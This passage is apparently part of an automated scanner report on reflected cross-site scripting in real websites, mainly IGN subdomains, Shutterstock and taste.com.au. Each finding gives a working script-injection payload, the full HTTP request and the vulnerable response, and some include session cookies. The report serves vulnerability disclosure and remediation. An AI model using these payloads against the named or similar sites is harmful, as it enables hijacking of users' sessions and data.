Remediation detail

Request

GET /objects/926/926417.html?39b44"-alert(1)-"6ad9b13b29e=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 121400
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317763378143v-96n-12mc+1317763378143mv+96mn+12wwe~0;Path=/;Domain=.ign.com
Expires: Tue, 04 Oct 2011 21:23:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
mscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/objects/926/926417.html?39b44"-alert(1)-"6ad9b13b29e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.433. http://xbox360.ign.com/objects/926/926417.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/objects/926/926417.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75b7a"><script>alert(1)</script>cf702b2dcb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /objects/926/926417.html?75b7a"><script>alert(1)</script>cf702b2dcb4=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 125535
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317763377861v-92n-12mc+1317763377861mv+92mn+12wwe~0;Path=/;Domain=.ign.com
Expires: Tue, 04 Oct 2011 21:22:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/objects/926/926417.html?75b7a"><script>alert(1)</script>cf702b2dcb4=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.434. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xboxlive.ign.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e7b"-alert(1)-"d21b9da3f04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?79e7b"-alert(1)-"d21b9da3f04=1 HTTP/1.1
Host: xboxlive.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:57 GMT
Content-Length: 11000
Connection: close
Set-Cookie: freq=c-1317763377789v-97n-12mc+1317763377789mv+97mn+12wwe~0;Path=/;Domain=.ign.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
if(docTitle == '') {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://xboxlive.ign.com/?79e7b"-alert(1)-"d21b9da3f04=1";
return true;

   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

1.435. http://xboxlive.ign.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xboxlive.ign.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae56"><script>alert(1)</script>37bf74b6682 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fae56"><script>alert(1)</script>37bf74b6682=1 HTTP/1.1
Host: xboxlive.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763372547v-83n-12mc+1317763372547mv+83mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 147188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xboxlive.ign.com/?fae56"><script>alert(1)</script>37bf74b6682=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.436. http://xboxlive.ign.com/articles/119/1197949p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xboxlive.ign.com
Path:	/articles/119/1197949p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99437"><script>alert(1)</script>df1d1fb3544 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/119/1197949p1.html?99437"><script>alert(1)</script>df1d1fb3544=1 HTTP/1.1
Host: xboxlive.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763378143v-93n-12mc+1317763378143mv+93mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xboxlive.ign.com/articles/119/1197949p1.html?99437"><script>alert(1)</script>df1d1fb3544=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.437. http://xboxlive.ign.com/articles/119/1197949p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xboxlive.ign.com
Path:	/articles/119/1197949p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5214a"-alert(1)-"db381a54140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles/119/1197949p1.html?5214a"-alert(1)-"db381a54140=1 HTTP/1.1
Host: xboxlive.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:23:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:00 GMT
Content-Length: 12438
Connection: close
Set-Cookie: freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0;Path=/;Domain=.ign.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://xboxlive.ign.com/articles/119/1197949p1.html?5214a"-alert(1)-"db381a54140=1";
return true;

   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

1.438. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xboxlive.ign.com
Path:	/index/games.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42468"><script>alert(1)</script>137757916c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/games.html?42468"><script>alert(1)</script>137757916c1=1 HTTP/1.1
Host: xboxlive.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763377828v-99n-12mc+1317763377828mv+99mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=2391n3hceh234;Path=/indx
Set-Cookie: JSESSIONID=e89gbqo7s9pc4;Path=/indx
Set-Cookie: JSESSIONID=75fieb7ms5k4e;Path=/indx
Content-Length: 145190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>IGN Xbox Live Arca
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xboxlive.ign.com/index/games.html?42468"><script>alert(1)</script>137757916c1=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.439. http://xboxlive.ign.com/index/games.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xboxlive.ign.com
Path:	/index/games.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b9bf"-alert(1)-"c891214c190 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/games.html?7b9bf"-alert(1)-"c891214c190=1 HTTP/1.1
Host: xboxlive.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:23:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763378143v-95n-12mc+1317763378143mv+95mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 145130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Xbox Live Arca
...[SNIP]...
of _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xboxlive.ign.com/index/games.html?7b9bf"-alert(1)-"c891214c190=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.440. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xboxlive.ign.com
Path:	/index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6512"><script>alert(1)</script>252dcce76c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?b6512"><script>alert(1)</script>252dcce76c4=1 HTTP/1.1
Host: xboxlive.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763376949v-92n-12mc+1317763376949mv+92mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 151041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Latest Video Game
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xboxlive.ign.com/index/latest-updates.html?b6512"><script>alert(1)</script>252dcce76c4=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.441. http://xboxlive.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xboxlive.ign.com
Path:	/index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 775d5"-alert(1)-"d497854a2ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/latest-updates.html?775d5"-alert(1)-"d497854a2ca=1 HTTP/1.1
Host: xboxlive.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:23:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763378143v-94n-12mc+1317763378143mv+94mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 152205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Latest Video Game
...[SNIP]...
oreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xboxlive.ign.com/index/latest-updates.html?775d5"-alert(1)-"d497854a2ca=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.442. http://searchportal.information.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://searchportal.information.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49afc'%3balert(1)//f254b686141 was submitted in the Referer HTTP header. This input was echoed as 49afc';alert(1)//f254b686141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?o_id=162786&domainname=www.nwsub.com%2Fnewsweek%2Fpublic%2Fcontact.asp HTTP/1.1
Host: searchportal.information.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=49afc'%3balert(1)//f254b686141
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 45325
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1317766586%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Awzpsssxspxxrwur; path=/; expires=Wed, 05-Oct-2011 22:17:44 GMT
Set-Cookie: Spusr=3c0015ac2e794e8b85bad445; path=/; expires=Thu, 03-Oct-2013 22:17:44 GMT
Set-Cookie: nwsub.com=search%3A0%7Cexitpop%3A0%7Clload%3A1317766617%7Clvisit%3A1317766586%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 05-Oct-2011 22:17:44 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head> <title> nwsub.com </title>
<meta http-equiv="Keywords" content="
...[SNIP]...
var afdt = s_token;


       google_afd_request = {
           channel: '011469',
           client: 'ca-dp-oversee32_3ph_xml',
           domain_name: 'nwsub.com',
           ref: 'http://www.google.com/search?hl=en&q=49afc';alert(1)//f254b686141',
           hl: 'en',
           q: 'personal finance',
           num_ads: '6',
           adtest: 'off',
           afdt: afdt,
           token: afdt,

           adext: 'as1,sr1'
       };
   }

           var clic
...[SNIP]...

1.443. http://wrapper.askmen.com/a [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wrapper.askmen.com
Path:	/a

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c8468<script>alert(1)</script>2c71664465f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /a?size=prestitial&network_name_override=askmen&channel_name_override=Homepage&pagetype=am_channel&rf=http%3A%2F%2Fwww.newscorp.com&r=http$3A$2F$2Fwww$2Enewscorp$2Ecom$2Foperations$2Fother$2Ehtml$23 HTTP/1.1
Host: wrapper.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=c8468<script>alert(1)</script>2c71664465f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; __utma=173688037.2045369409.1317753551.1317753551.1317756136.2; __utmz=173688037.1317756136.2.2.utmcsr=askmen.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:06:12 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: NGUserID=175e5;Path=/;Domain=.askmen.com;Expires=Wed, 02-Apr-31 20:06:12 GMT
Set-Cookie: freq=c-1317758771925v-8n-12mc+1317758771860mv+0mn+0wwe~0;Path=/;Domain=.askmen.com
Content-Length: 2800


if(typeof _comscoreGuard == 'undefined') {
   if(typeof COMSCORE=="undefined"){
var COMSCORE={}}COMSCORE.beacon=function(d){if(!d){return}var a=1.6,e=document,g=e.location,c
...[SNIP]...
load=function(){};b.src=f;return f
};

   COMSCORE.beacon({
    c1:2,
    c2:"3000068",
    c3:"",
    c4:"http://www.google.com/search?hl=en&q=c8468<script>alert(1)</script>2c71664465f",
    c5:"",
    c6:"",
    c15:"" });

   var _comscoreGuard = new Object();
}
...[SNIP]...

1.444. http://wrapper.ign.com/a [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wrapper.ign.com
Path:	/a

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a6719<script>alert(1)</script>df7be3d32bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /a?size=text&Loc=ign.com&pagetype=stitial&dechannel=ign HTTP/1.1
Host: wrapper.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=a6719<script>alert(1)</script>df7be3d32bc
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; rsi_segs=; freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:02:39 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 36160

if(typeof showStitial == 'undefined' || !showStitial){
if(typeof adString == 'undefined') var adString = "";

var tileDate = new Date();
var tile = tileDate.getTime();
var isLinked
...[SNIP]...
load=function(){};b.src=f;return f
};

   COMSCORE.beacon({
    c1:2,
    c2:"3000068",
    c3:"",
    c4:"http://www.google.com/search?hl=en&q=a6719<script>alert(1)</script>df7be3d32bc",
    c5:"",
    c6:"",
    c15:"" });

   var _comscoreGuard = new Object();
}
...[SNIP]...

1.445. http://www.shutterstock.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.shutterstock.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b1a4</script><script>alert(1)</script>f7b8bd7b4c0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.shutterstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7b1a4</script><script>alert(1)</script>f7b8bd7b4c0

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 21:51:37 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_perl/1.30
Vary: Accept-Encoding
Set-Cookie: ssssidd=484f19cc152402db5e14335cb1d73f08; path=/; expires=Thu, 03-Nov-2011 21:51:37 GMT
Set-Cookie: sst_relevance_sort_methods=relevance_sort_methods.sort_method_options3; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:37 GMT
Set-Cookie: sst_Search_Feedback_Flyout_English_100=Search_Feedback_Flyout_English_100.search_feedback2; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:37 GMT
Set-Cookie: sst_single_image_price_test=single_image_price_test.single_image_price_test_v1; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:37 GMT
Set-Cookie: sst_subscribe22_design_test=subscribe22_design_test.subscribe22_design_test_v1b; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:37 GMT
Set-Cookie: sst_Grid_Discovery_Sep_14=Grid_Discovery_Sep_14.grid1; domain=.shutterstock.com; path=/; expires=Mon, 02-Jan-2012 21:51:37 GMT
Content-Type: text/html; charset=utf-8
X-Cache: MISS from www.shutterstock.com
Connection: close
Content-Length: 57784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<tit
...[SNIP]...
king request..
   event: ["","215434572","1","311647593",null,null,null,null,"","484f19cc152402db5e14335cb1d73f08","","50.23.123.106","US","en","explorer","7.0","/","http://www.google.com/search?hl=en&q=7b1a4</script><script>alert(1)</script>f7b8bd7b4c0","286,295,196,259,235","","","","","","","","1317765097267941472",null,"","popular","","","","","","",""],

   name_to_column: {"notes_json":36,"contributor_id":31,"browser_identity":14,"input_value":2
...[SNIP]...

1.446. http://www.taste.com.au/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.taste.com.au
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 114da'%3balert(1)//eb416820507 was submitted in the Referer HTTP header. This input was echoed as 114da';alert(1)//eb416820507 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

